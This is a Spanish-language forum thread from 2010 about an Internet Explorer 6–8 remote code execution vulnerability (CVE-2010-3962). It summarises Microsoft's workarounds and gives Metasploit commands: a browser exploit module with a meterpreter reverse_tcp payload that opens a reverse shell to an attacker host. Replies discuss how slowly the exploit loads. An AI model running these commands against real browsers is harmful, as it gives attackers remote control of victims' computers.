[0 Day] RCE en Internet Explorer 6, 7 y 8

Iniciado por Shell Root, 24 Diciembre 2010, 17:31 PM

0 Miembros y 1 Visitante están viendo este tema.

Shell Root

[0 Day] RCE en Internet Explorer 6, 7 y 8


INFORMACIÓN
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.

El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).

El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:

  • Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
  • Utilizar el kit de herramientas EMET
  • Utilizar la protección DEP para IE 7
  • Leer correos en modo texto
  • Fijar las zonas de Intranet e Internet en modo de seguridad "Alto" para bloquear los controles ActiveX y el Active Scripting en esas zonas.

También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.




El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.

Exploit
Código (ruby) [Seleccionar]
use exploit/windows/browser/ms10_xxx_ie_css_clip

Payload
Código (ruby) [Seleccionar]
set PAYLOAD windows/meterpreter/reverse_tcp

Comandos del Metasploit
Código (ruby) [Seleccionar]
use exploit/windows/browser/ms10_xxx_ie_css_ clip
set SRVHOST IP
set payload windows/meterpreter/reverse_tcp
set LHOST IP
exploit


Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.

[youtube=425,350]http://www.youtube.com/watch?v=xbIxkltlP1I[/youtube]

Visto en: :http://daw-labs.com/rce-en-internet-explorer-6-7-y-8/
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

EvilGoblin

corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿
Experimental Serial Lain [Linux User]

.:WindHack:.

Cita de: EvilGoblin en 28 Diciembre 2010, 16:21 PM
corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿

Exactamente, es algo demorada la ejecución del exploit y en algunos casos no se completa la carga de manera correcta.

Follow me on Twitter: @windhack | Visit my website: www.daw-labs.com

"The only thing they can't take from us are our minds."